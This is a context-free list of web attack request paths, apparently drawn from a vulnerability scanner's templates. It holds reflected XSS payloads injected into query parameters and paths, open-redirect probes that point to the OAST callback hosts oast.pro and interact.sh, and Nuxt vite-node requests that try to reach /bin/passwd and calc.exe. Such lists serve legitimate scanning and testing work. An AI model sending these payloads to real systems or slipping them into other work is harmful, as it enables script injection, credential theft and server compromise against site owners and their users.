/mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E
/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x
/embed.js
/karma.js
/?return_url=javascript:alert(document.domain)
/api/logout?redirect_to=http://oast.pro/
/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php/interact.sh
/user/login/?next=https%3A%2F%2Finteract.sh
/user/logout?next=https%3A%2F%2Finteract.sh
/user/register?next=https%3A%2F%2Finteract.sh
/user/resend-activation?next=https%3A%2F%2Finteract.sh
/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}
/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test
/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename
/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/unsafe/plain/https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg
/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/templates/pages/debug_panel.php?id={{randstr}}
/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27
/project/switch/1?targetPath=http://oast.pro

/file=https://oast.pro
/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/__nuxt_vite_node__/module//bin/passwd
/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe
/__nuxt_error?stack=%0A{{url_encode(payload)}}
/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh
/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E
